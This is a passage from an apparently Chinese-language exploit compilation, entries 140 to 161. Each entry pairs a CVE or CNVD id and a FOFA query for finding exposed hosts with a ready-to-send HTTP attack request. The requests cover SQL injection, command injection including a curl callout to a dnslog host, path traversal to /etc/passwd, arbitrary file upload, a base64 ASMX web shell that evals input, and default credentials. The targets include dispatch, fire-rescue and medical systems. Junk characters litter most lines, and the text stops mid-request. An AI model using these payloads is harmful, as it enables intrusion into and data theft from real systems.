FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 X$ ~ W( ~6 I0 U! k: A6 I7 i; T
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1+ m& _* r" b O. P9 P, L0 T
Host: x.x.x.x( c6 | m: H" \0 i7 H7 R6 ^8 [* b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" D- d" V1 ?7 G5 N( pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) C- I% X4 M% Q. O* v) a8 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. u# C3 I$ [5 s/ ~3 p* z/ T9 h' JAccept-Encoding: gzip, deflate, br" W3 w/ C$ ~+ G1 Q
Connection: close' P# s2 P: A+ x" ?( n$ P( X
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
7 ?0 |" W8 E/ }" c7 }9 j6 H$ ?7 jUpgrade-Insecure-Requests: 19 {9 n& I$ Z8 H! r# O! i, P- z
" Y- U6 o. ^, A# \
2 g% y: v( w3 J- _3 v% T3 W7 V+ I140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入 ]0 h H: [& m0 ]
CVE-2024-2566
" f1 f9 |/ p4 I8 `% N! N( H2 `6 z( P7 qFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"+ A) q& `, M/ o& I. c( a, B
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.18 ?8 c0 o7 o+ K: q7 b: v5 B( j6 R# D0 f
Host: x.x.x.x
" `3 ~+ k# `2 S' V6 R% _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0, n+ Y7 ?" f. d9 d+ Z$ T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& c( E# r: v& J1 ?2 ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% v6 j9 }! h; \& A
Accept-Encoding: gzip, deflate, br( |; c4 I# S2 \" t. u) e
Connection: close. g. }. E/ I4 r6 `$ O' Y* Y
Cookie: authcode=h8g9# O5 A) F3 r( q W! H; [/ R" j
Upgrade-Insecure-Requests: 1
# I0 v K% S& U" f
8 {, V5 [$ z+ [/ F4 j( F1 o: L/ }% \" h) v* A3 n. Y
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
: u& O4 ]- ^5 h- {FOFA:body="指挥调度管理平台"
) p2 K5 S7 I& j3 E TPOST /app/ext/ajax_users.php HTTP/1.1
& L- h+ U6 f) e9 M) O8 bHost: your-ip( I- ]) q8 W3 x9 h" ]1 P
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
8 L4 {) ` B. ?; {! Z" e6 B$ CContent-Type: application/x-www-form-urlencoded
) @8 C$ z9 F p% p: G2 P' K6 Z" ]2 u: R. ]+ b) @
) `* ]( D O+ U+ v) m
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -5 c! E3 F$ G/ ?, d1 ^# w# i
0 ~. k. r( h# C3 b3 O9 Y! c+ J/ O/ \: K1 @
142. CMSV6车辆监控平台系统中存在弱密码
* \) v0 ^$ J( a& }- GCVE-2024-29666
. Z" M' S* q& K( |! u1 kFOFA:body="/808gps/": H- G$ c! j8 z; t
admin/admin! ~7 I' m, A- x* i/ M
143. Netis WF2780 v2.1.40144 远程命令执行
" x3 F" G/ K2 aCVE-2024-25850
1 S* K) p3 Q" ]3 DFOFA:title='AP setup' && header='netis'
, s* Z! ~9 s) WPAYLOAD
* G2 h! q; Z. h+ v* c3 ~! |" a" u9 W
144. D-Link nas_sharing.cgi 命令注入
7 `* g$ P% u7 O8 A2 CFOFA:app="D_Link-DNS-ShareCenter"
1 Z( l. E6 s$ W% S$ d6 v$ Asystem参数用于传要执行的命令
M( C( F# m7 j* [3 ]' XGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
; k G8 j; _3 y$ @. AHost: x.x.x.x9 h' E1 v8 i# p
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
4 b$ k- I7 H) |! M( vConnection: close
7 N. v' P0 t9 u* ^0 h9 D. qAccept: */*7 v5 o2 L+ |+ `
Accept-Language: en4 U: Q. g8 i) ]8 A
Accept-Encoding: gzip5 c" X. |3 o' N* `* r( \$ L# e0 K" P, t
& F* i) X8 {6 F( ^
1 D* X5 v6 e7 z3 |. A) m145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
2 L9 d7 C; W0 I# X! FCVE-2024-3400
2 \* T6 Z2 l6 c+ |FOFA:icon_hash="-631559155"
; q; J# ]" B+ i' ]( h% ZGET /global-protect/login.esp HTTP/1.18 R: y+ s, m# R8 X6 s/ L) w
Host: 192.168.30.112:1005$ n6 O! p. {4 Y5 Z( c: Q. b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.845 g, [! J* _$ K6 A7 h2 a
Connection: close7 z% |! i9 `. x, ?
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
9 R% j+ I4 f: ?1 V+ x+ d8 PAccept-Encoding: gzip/ I1 x/ o: f. z: w9 m7 p
$ |4 x/ h% H& I8 {, P1 m& f
/ {$ \3 C& j p/ F4 K146. MajorDoMo thumb.php 未授权远程代码执行5 X- ~; D$ K! s) Y6 p/ u
CNVD-2024-021753 G- i" F# q3 d4 C) a2 o' e/ Z
FOFA:app="MajordomoSL"$ ?- D8 Q8 `. J( @* q" g
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.12 F* Z, y' l, k+ k+ U+ a5 o5 V
Host: x.x.x.x$ T) m+ d* g7 T7 d/ f2 `* ?1 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84! C( u5 E7 B4 p2 L' O
Accept-Charset: utf-8
* @' W# K1 C# t( L7 HAccept-Encoding: gzip, deflate
, N e7 t- @9 c5 h1 J% ~Connection: close
/ N( t4 q+ H7 ]& l% f- G2 S% }# p9 T& I2 [
3 c- w. y. `' @
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
" v9 |4 l" s8 x7 v6 ~" xCVE-2024-32399
0 I, ^( l1 s! \; N0 WFOFA:body="RaidenMAILD"
) Z& U) ~6 W T; \, N3 ~! RGET /webeditor/../../../windows/win.ini HTTP/1.1/ b* I( K6 s' d7 U( z. ?# i! S
Host: 127.0.0.1:81# e2 B( o- l& v1 Z4 A& D
Cache-Control: max-age=0: v! P/ F5 f" p( Y
Connection: close# E, Q9 `- ^3 @ F/ d
% x9 ?' L- X9 W' R
3 c. f& c0 H5 g5 L+ N148. CrushFTP 认证绕过模板注入% B- i- [ P- q- S& I8 j/ z7 c0 g
CVE-2024-4040$ V8 X, r o- l, p! [+ ^6 u+ k2 D
FOFA:body="CrushFTP" o5 F) G P/ D! t; f
PAYLOAD0 B9 e' i) G n* n. C, d' b! l
/ a8 n" \+ y0 e9 \149. AJ-Report开源数据大屏存在远程命令执行
" ]3 {$ f" a: P, IFOFA:title="AJ-Report"6 c$ T' D6 W; Z$ {$ D5 y
$ ]2 u+ ~/ D! h" YPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1: u/ a$ [. g2 B) h$ M9 D. y
Host: x.x.x.x4 m1 u0 M a/ Z5 a1 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 G# L5 i& d1 O* V/ Z( u' K- SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ I8 w7 I' _/ v& l" i1 X3 T
Accept-Encoding: gzip, deflate, br/ w; `4 P6 _0 o, C1 o7 w* s
Accept-Language: zh-CN,zh;q=0.9
% ^, i( ], S" F" {3 F+ q+ v; ^) m0 LContent-Type: application/json;charset=UTF-8; M' R2 d7 L9 I3 w4 D; \
Connection: close7 D8 b% a- I q6 n7 m$ H) Y |: p
P' U; i. X) \; s
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
" M7 K, A3 G) `) I
. u4 V2 C4 ]/ q, s! X5 D( S150. AJ-Report 1.4.0 认证绕过与远程代码执行, f% G0 z( i$ ~/ ^2 u2 ~% J
FOFA:title="AJ-Report"
- Q# k- G1 E- q9 ?5 w7 @5 \8 TPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1, G5 H8 C7 G, h9 f1 Q2 V I. S8 M! k
Host: x.x.x.x0 _% x9 q( E8 G5 w$ P$ r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( a( k$ A/ G' z" k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 F& B1 Q( R* c2 A
Accept-Encoding: gzip, deflate, br# g' O8 B% \5 ?5 q1 E* z
Accept-Language: zh-CN,zh;q=0.91 b [5 t, A" m" ~3 s' S
Content-Type: application/json;charset=UTF-8
1 J- @, A$ {. d) [8 {( K. wConnection: close; u! r7 |$ b! t& y* v
Content-Length: 339
5 ~: U1 w5 b; F+ Q4 F' h4 _( m+ O2 Z( |3 X2 W1 c0 [
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}' e$ I7 p9 V3 t: [( R
' ^6 t% x# R- v+ Y2 W7 n$ u( k3 ~& P& O- N* U2 x2 V* Z
151. AJ-Report 1.4.1 pageList sql注入, E- W% }: Y* m7 B) H" b
FOFA:title="AJ-Report"& D3 k! O' r$ H& b9 N
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
& b1 f; G9 |) nHost: x.x.x.x
! c+ |1 o4 K- r, u, ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; I7 T" Z: L9 N' p0 L/ {2 B
Connection: close
( N3 L9 ]( r. FAccept-Encoding: gzip# Y* p/ r! v8 q
4 N: `$ o( e4 i* X+ O2 t, R& z
, v# A3 ~- ~8 B) U( Q! l* R# h# @152. Progress Kemp LoadMaster 远程命令执行
8 K1 i" M5 }# z% s& N5 Y5 dCVE-2024-1212 w% Q( F: `2 Y" L v0 N
LoadMaster <= 7.2.59.2 (GA): S4 L/ o+ p; }* z; k
LoadMaster<=7.2.54.8 (LTSF)! m7 V1 O, l# {# B4 m7 U
LoadMaster <= 7.2.48.10 (LTS)
. f5 B, i$ Q/ ]4 y, A' A# i9 JFOFA:body="LoadMaster"
$ g, Q* E* R4 f8 s$ Q/ O) R' t8 T( ]JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码8 V) k- l m; Q- L- W
GET /access/set?param=enableapi&value=1 HTTP/1.11 F N5 \. I: R
Host: x.x.x.x
2 D1 h: v# Y5 a/ k! x, d7 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Y9 F. |" m% ]+ U$ H( ]Connection: close. x4 x/ Y" L, c
Accept: */*
& y$ z o% ^* W. zAccept-Language: en
6 j8 S9 w! c, ~; e9 D5 K" Y8 RAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=. {/ _$ h6 @' e0 U7 o3 B9 T$ C
Accept-Encoding: gzip& l7 ~ _. g1 S5 {0 z
9 n7 s" G8 K6 R9 G; i
; E; q+ O: K1 R- ~& p+ w153. gradio任意文件读取9 N4 F4 S t" R1 J1 U
CVE-2024-1561FOFA:body="__gradio_mode__"2 S7 A8 a" Y0 X; K
第一步,请求/config文件获取componets的id
" r3 }1 B" Z' khttp://x.x.x.x/config$ Z1 o. k" Z1 k# B; Z! w) i
! h( W% {, [: h7 J5 o, m
& x' Z7 A; B, B5 _3 j第二步,将/etc/passwd的内容写入到一个临时文件
( r& T; o2 i# @/ ~" k1 |5 ?POST /component_server HTTP/1.1
9 t% S9 s: O' i# \Host: x.x.x.x$ M {+ k, p8 M+ \: p$ ]3 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
6 m. g; d9 \; G/ M& zConnection: close
, w* K5 q) \4 Z. j/ f9 R0 F9 EContent-Length: 115
& w# G" E5 E) ~; z ^Content-Type: application/json
* m* n" Q/ w- gAccept-Encoding: gzip
L& R$ x7 ^" l% k H% s9 A! g, D, Z" A2 V
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
7 w7 e$ \" }1 I
! x- Y( N i% B" `& k- a& x3 z, B$ ]4 e' J
第三步访问" h+ u9 s" t, ~# ~& r; l+ ]! q
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
6 ~: p8 Y$ m2 o8 i' J3 o; x
! Y) s1 T" f% T, Q S/ B- R! N# z; _7 n
$ p( S5 U% K* X, w% Q, H154. 天维尔消防救援作战调度平台 SQL注入
( i2 ~8 @0 _0 zCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
$ F$ m+ }, A& I) I$ j% cPOST /twms-service-mfs/mfsNotice/page HTTP/1.1( n, n* D5 b* W' S# i- w$ |. b. Z
Host: x.x.x.x
" P; t" f: |7 G C* O0 WContent-Length: 106
% j. J; x( @' Z6 bCache-Control: max-age=0! f- Z+ o7 ]0 v8 N& _
Upgrade-Insecure-Requests: 1
% G9 o- { c5 ^2 i" POrigin: http://x.x.x.x, e) ~& b2 x+ f( r. t' R- m
Content-Type: application/json$ _, `4 X% B4 `. e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
$ q4 x/ W" D% h# h2 Z$ P; \8 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 h+ o5 S7 N$ N" t6 t4 kReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page. B9 j6 o7 u$ F; J0 B0 a5 b
Accept-Encoding: gzip, deflate
# S5 H& | Q& t7 U$ R8 M4 {: T3 pAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
; _8 E6 M- g+ n2 IConnection: close4 a3 i5 g# e5 Y* g
2 }0 [) K5 o G* ~{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}1 t2 F% W) P: g) s" ^* C
1 m- x' v4 d. l
' P0 F% l+ ~! t4 ]& n4 ?155. 六零导航页 file.php 任意文件上传" q9 A8 f3 `$ r4 f
CVE-2024-34982: k# K# K+ S9 V8 b. x* K f3 b
FOFA:title=="上网导航 - LyLme Spage"# r, p: `7 x3 h" z
POST /include/file.php HTTP/1.1& a# g) f5 y5 q$ f# b
Host: x.x.x.x
, Y# a6 k& f6 E# d( zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
8 m- l4 b" ?' w* RConnection: close, V4 ~" t/ L# i! |6 ]
Content-Length: 232
% v- U( f n: [, zAccept: application/json, text/javascript, */*; q=0.01 e% F2 M, O4 ?! y. U
Accept-Encoding: gzip, deflate, br
9 Y+ S, @1 M# _$ M7 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( G" L4 g/ b/ s. w" G0 ?0 W! M
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f* A9 V$ o3 @4 D/ y( f. C; ^
X-Requested-With: XMLHttpRequest
+ z7 h: J- u4 C5 y
. ?/ C1 Q8 e4 E% \% t7 J-----------------------------qttl7vemrsold314zg0f/ g) K1 q5 L" O) Y
Content-Disposition: form-data; name="file"; filename="test.php"% F7 i2 p0 v" N$ C0 S4 u+ A6 `# b
Content-Type: image/png2 p2 h; f9 S0 z( w) [" m) `
g! M o6 \* u8 c/ ] T
<?php phpinfo();unlink(__FILE__);?>
, Q! x* v) n2 A4 p+ W-----------------------------qttl7vemrsold314zg0f--0 i0 a* d# J- O( j- v& A" ?! T
" o$ ~5 ?3 ]: a$ _/ A
! Q0 [4 b% R4 [* E$ J) i
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
5 \4 x* F o* F; e9 h) R4 V, B7 _- {: v+ j8 i
156. TBK DVR-4104/DVR-4216 操作系统命令注入
; w0 n$ l, j+ p9 p# B7 ?' @4 Q/ tCVE-2024-3721
. E: O& w- ]; VFOFA:"Location: /login.rsp"# f: m H! K. ?7 x$ n% K
·TBK DVR-4104
5 D4 I$ R" y% Y# r: I7 D·TBK DVR-4216+ F- _! G5 R8 v g" ] `
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
, J! s% T# V3 J7 A5 N4 T; n9 _6 R& e% W
+ {$ f- m5 Q' }7 @# b3 @
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
2 z( C7 V ^; u2 t4 @% _* mHost: x.x.x.x* k2 n0 O0 I$ u% W2 _
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ G8 j6 V9 J' w# @: iConnection: close
3 D0 x* _1 {9 l& g2 q8 V5 h" aContent-Length: 0
8 M9 j! }3 A' T- Z! L/ mCookie: uid=10 g& s$ Z( l- t. O
Accept-Encoding: gzip
! t! ?* R% ^/ Z1 D, o0 `
v" D" G: i: H/ h$ l. n
5 }% ?% t( K) K3 i E4 ?( \+ y% F$ l2 j. r157. 美特CRM upload.jsp 任意文件上传6 k' p6 ?; A! k' a
CNVD-2023-06971
7 s5 O2 p: A- B# q7 JFOFA:body="/common/scripts/basic.js"
& m. v5 Q6 w0 M, ?( BPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
0 J, |. n2 w$ p. K1 a, r# JHost: x.x.x.x: k3 t- M2 F" G8 a: Z/ z& m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36' B5 @6 z9 }# x. Y1 r3 _
Content-Length: 709
) K. n# s+ C; D+ }5 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
R& K3 b& \, j/ i2 d9 l* k# zAccept-Encoding: gzip, deflate
/ T& V1 M) U& L4 }) _1 z' |Accept-Language: zh-CN,zh;q=0.9; z6 z4 `$ V" r3 L9 x/ u
Cache-Control: max-age=0; d- P$ X& c- _4 E6 o ]
Connection: close/ s6 s$ `# H% c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN; ~0 f) T0 k$ Y- b, q; S' T
Upgrade-Insecure-Requests: 17 n! c* {) f6 s
1 q$ _0 ?' L' w; P0 t2 `------WebKitFormBoundary1imovELzPsfzp5dN( y2 s* W" D% R6 L4 e
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"8 M0 e9 q( z* X- w: }. A! K. S, a
Content-Type: application/octet-stream0 ^" z, ^7 c+ V0 Z
1 l. D, t6 T# W' o9 [, V9 O- m% V
nyhelxrutzwhrsvsrafb
]9 v" t5 Q2 d: E3 Q------WebKitFormBoundary1imovELzPsfzp5dN
, T9 ~3 f4 P1 V8 t0 pContent-Disposition: form-data; name="key"+ k& e, f' `; J
7 M: A3 g' m! Z# A. p3 lnull& [. [) ~2 ~ ?
------WebKitFormBoundary1imovELzPsfzp5dN
. ^0 h- k" d; B M0 OContent-Disposition: form-data; name="form"2 D) s) a, e0 P& X3 R/ u [
! J% E, L$ E- b
null" M2 I4 [, A% |# L8 d
------WebKitFormBoundary1imovELzPsfzp5dN
0 V6 D* E7 K+ T% GContent-Disposition: form-data; name="field"- P2 T) M c4 ]+ I* d
, `2 k7 \ F' t- R; fnull; [6 u4 Q$ e% Z4 C
------WebKitFormBoundary1imovELzPsfzp5dN
, p/ K$ A+ ]6 P, q vContent-Disposition: form-data; name="filetitile"8 I# K1 T% b" F( e# t( H
/ B9 T0 Y; @* f/ G
null
( ]2 `6 r2 X3 I! C. w6 r------WebKitFormBoundary1imovELzPsfzp5dN" h. z# U* X) E; {6 g* B1 N
Content-Disposition: form-data; name="filefolder") d& x- P- S' L' q
1 D1 B! p( p8 F: V+ A& ]
null' V, g$ L( H v- S7 S+ B1 L( w
------WebKitFormBoundary1imovELzPsfzp5dN--
1 N, o0 u" B# ^
6 I3 D& T6 }% t/ o6 f+ i2 D' c& | g! P; K7 O# V- f
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
7 \; i: J/ R3 @. w1 J
& i" a, O1 r L" A7 o158. Mura-CMS-processAsyncObject存在SQL注入+ H2 m: u& M7 c
CVE-2024-32640
. O0 [- C: p1 ^& s2 XFOFA:"Generator: Masa CMS"
% O3 z, x5 G& S( I2 L/ \! I( t% |POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
1 o; V- G3 u" k! {$ KHost: {{Hostname}}3 [. _$ e* o$ H7 b0 L; y- W
Content-Type: application/x-www-form-urlencoded6 ?# ~+ j+ G% h/ _5 A { U9 {
0 |9 n+ M6 H0 I/ y( Y
object=displayregion&contenthistid=x\'&previewid=1. ~5 U0 i- t9 E% _+ w" ]5 T1 e
; p/ }3 h, H0 `" K, ]
: K8 x. a6 V2 y- \. f. \, D159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
$ a, [! N3 A; ?5 c' a, ?+ JFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
! U: J7 r, ]5 h% \7 ]: L& cPOST /webservices/WebJobUpload.asmx HTTP/1.1
: P; N) ?" O0 w7 y) f, l4 A, S5 hHost: x.x.x.x/ j- o6 T4 o6 b( @6 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.369 c5 _( p7 W/ I+ R7 T
Content-Length: 1080
4 J/ h" j( K M+ q' }Accept-Encoding: gzip, deflate# @) |$ `) G! t/ Q9 n' L) `3 V+ J
Connection: close8 Y1 V* m4 C# c
Content-Type: text/xml; charset=utf-8
) P$ c) z; l, l- ~9 V# z0 }Soapaction: "http://rainier/jobUpload"' n5 W0 N* a& \/ I$ e
8 M% S( t- _. d<?xml version="1.0" encoding="utf-8"?>8 X/ k" l2 q5 V1 J( L
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">+ `/ d* P! v6 c
<soap:Body>
8 u" [- A4 C( k<jobUpload xmlns="http://rainier">, K$ ?& _$ y% l1 i, }
<vcode>1</vcode>
* W4 }; J" l8 s* y7 q<subFolder></subFolder>( q3 Q1 B2 Q/ C) V& i$ [& s9 D8 g& ]
<fileName>abcrce.asmx</fileName>
( ~' x, o- Q+ S1 {( F/ E: S<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>6 A2 ^& v7 d9 P6 H& M
</jobUpload>0 W: }$ W, x/ I- H4 ^2 K
</soap:Body>
! @# L$ b# o$ b6 m( Z. R</soap:Envelope>
2 D8 a$ n) ?6 E- B' J) I- A& {( ]* z# E$ f( Z( f3 R) q
- ~% u: [3 A; m7 ?/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")( l" o4 g; j/ A: [- u' D
9 e8 m2 O" m7 K9 N: E
' x4 m" _3 C9 l( U
160. Sonatype Nexus Repository 3目录遍历与文件读取
- [2 e, F8 H) K% b& Q2 W* OCVE-2024-4956+ q3 p( z V: J" x9 ^
FOFA:title="Nexus Repository Manager"
% F i5 x) @: O, C0 T0 KGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1% X5 C; {" ^# r; v5 Y
Host: x.x.x.x
* i9 @% L. _+ t: B& _User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
; C7 h3 _8 ~( t1 \4 OConnection: close2 {9 H! I5 H! @
Accept: */*
, E' V4 g; Z* h" D0 I& XAccept-Language: en+ H4 @* V: ]0 R1 T! |
Accept-Encoding: gzip
6 _* |1 f/ F2 }9 W9 R4 O$ H( @: n: S( U
$ I% Z3 F' b& b/ I) l- j8 I. t& c) E. X: F) Z
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
- ?/ o9 E1 ?* M& R8 p; U0 X) iFOFA:body="/KT_Css/qd_defaul.css"5 L' P* ?4 X- Z- @# `) T/ [
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密 ]6 E0 ~/ p4 U$ d) r- Q' I
POST /Webservice.asmx HTTP/1.1! P0 p4 G" Z5 r
Host: x.x.x.x
. H# O" t, \+ K5 @# Z: o: YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36% o; M$ t* f8 A$ L" w* t. ^" m( k2 Y7 d) N
Connection: close7 a4 ?4 k. P1 I: A" s8 p! B1 t3 z8 r
Content-Length: 445! }8 l" G6 J" f' N
Content-Type: text/xml( o9 U6 ?6 H2 G7 C2 s7 t
Accept-Encoding: gzip
7 U; u& L/ S: ]9 z' n" L3 J
5 X* C2 y1 h) h! \% |/ K<?xml version="1.0" encoding="utf-8"?>
) I1 X5 ]8 H. y' _ N<soap:Envelope xmlns:xsi="
& v' T g9 B1 _$ Qhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema": u0 x6 U' M3 x3 ?8 M+ J
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">6 c) z x' o6 {3 i: f
<soap:Body>! i% \; C6 B I
